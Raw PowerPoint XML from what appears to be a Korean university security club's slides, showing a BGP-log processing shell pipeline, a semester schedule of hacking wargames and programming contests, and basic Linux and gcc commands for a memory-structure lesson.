            <a:off x="7405470" y="5292213"/>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err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>=`bgpdump -m $f</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE3CA4F-E852-4EA6-B0A4-2F45CBB232C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2485591" y="3105179"/>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grep 131279</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C2C4D5-AA42-40C5-8288-8FFCCCD6DAAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050933" y="4717311"/>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awk -F "|" '{print $3}'</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0443BA4-B047-405C-8DE5-2A26A4095CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3064790" y="5665253"/>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sort</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1453A1C-4013-4D8A-B265-A9928EFA27AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5192486" y="4497765"/>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uniq -c</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCE8BA6-EB4E-466B-8207-2BA2A4125C5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6014819" y="3105179"/>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&gt;&gt;../result.csv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E295DD6-61B5-4273-8360-FE1BC1798821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077662" y="3745197"/>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sed 'N;s/\n/ /'`</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE9B47F9-801E-4BC0-8B53-830697A475F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059136" y="1921912"/>
            <a:ext cx="5374822" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt;  2014/12/23   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>BGP log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>download</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3973985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19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="2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72ED559A-5CA8-4324-B002-5A50B0FAF039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2280178393"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1646344" y="1814697"/>
          <a:ext cx="8674601" cy="3501813"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1921850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623680942"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1855239">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1126213368"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2448756">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3922511956"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2448756">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="98228301"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="674110">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1</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2~3</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4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>주차 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>~</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" alt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dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2206188386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="901343">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정보보호 동아리 소개</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OT )</a:t>
                      </a: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3.18 1600 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>백도우</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3.16 1900 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>이원철</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="7030A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BaekJoon</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7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>이원철</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&amp;</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시스템 보안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HackerSchool</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> FTZ</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solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>백도우</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국제 프로그래밍 대회</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>(ICPC)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t> 실전 준비</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FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>* </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월 예선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ICPC </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>참가 가능한 인원</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF000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chemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ICPC </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>참가</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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예선 </a:t>
                      </a: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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>본선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>11</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8060801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="901343">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심화</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t>코드게이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t> 참가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>? </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>미정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>)</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2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>일간</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6159294"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="932374">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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1"/>
                        <a:t>시스템해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1"/>
                        <a:t>웹해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1"/>
                        <a:t>리버싱</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
                        <a:t>)</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실전 문제 풀이</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Pwnable.kr   Rebersing.kr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안보지원사 해킹대회 참가</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아직 일정 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>통상 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</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8743380"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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2F2AE09C-085D-457A-9C0A-5981786EA18E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080980" y="5358703"/>
            <a:ext cx="6177195" cy="12852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dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>주차 까지는 자유롭게 두 분반 모두 듣고 결정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>주차 부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>분반 중 하나 결정하여 활동 참여</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>반장 송재경 주관 인원 분배</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32468646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a:t>국방사이버보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기말과제</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D7396CDB-F4E0-470C-96D7-873BE475D9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="445623" y="1921912"/>
            <a:ext cx="5403718" cy="35943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그림 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1674A5C1-0BF3-42AF-BF48-239620DF63A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092795" y="1732881"/>
            <a:ext cx="5555610" cy="43717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0869501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4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{183A7CE2-82B6-4927-9876-5F31E4C6A6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56821"/>
            <a:ext cx="5364243" cy="400143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AC0586F6-8ECF-4283-A457-03F47D6EE2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6608" y="1856821"/>
            <a:ext cx="5726611" cy="427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19771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266" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0AA773C-14EF-4A37-BBC0-6F886F26F2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921912"/>
            <a:ext cx="5285154" cy="394244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AF4890CE-C619-4B37-BCE4-BE23F2D350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7527" y="1921912"/>
            <a:ext cx="5517933" cy="4116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57090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42" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06A785F-3827-4F15-8E20-629BE1C172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795" y="1690688"/>
            <a:ext cx="5321187" cy="396931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4B8CDBE8-9EEE-46C3-9DA3-704751E938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4019" y="1676655"/>
            <a:ext cx="5769213" cy="4303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513405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290" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF7B2141-F865-4F5C-9BD5-31D15E870F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686" y="1676655"/>
            <a:ext cx="5515876" cy="411454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CE2D9F07-11BD-46B8-B88E-7E252BF7AF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2197" y="1676655"/>
            <a:ext cx="5712734" cy="4261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73004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314" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{398F93CF-81E5-494D-8043-F353848B18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946" y="1666304"/>
            <a:ext cx="5726611" cy="427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42191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 메모리 구조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 name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1638C2BF-E737-4CF1-9271-B620FB4F62E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838199" y="1921912"/>
            <a:ext cx="5109376" cy="1485791"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="4634455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="사각형: 둥근 모서리 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880E4D0E-B0D4-4619-B7C3-E19AF3D0CE1B}"/>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3" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148F76FC-A020-45B8-8C27-58D8CFE89112}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="4634455"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> test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 cd test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touch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vi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endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="그룹 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{916C0D68-184D-4013-BBB5-35AD80683AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244427" y="1921912"/>
            <a:ext cx="5109376" cy="3144707"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="6187330"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="사각형: 둥근 모서리 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D3B273-6C48-4667-8109-771C5D2CC3B8}"/>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8" name="TextBox 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148238E7-2E67-427E-8C5D-087E95A28A50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="61873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gcc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> –o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>test_code.c</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test_code</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
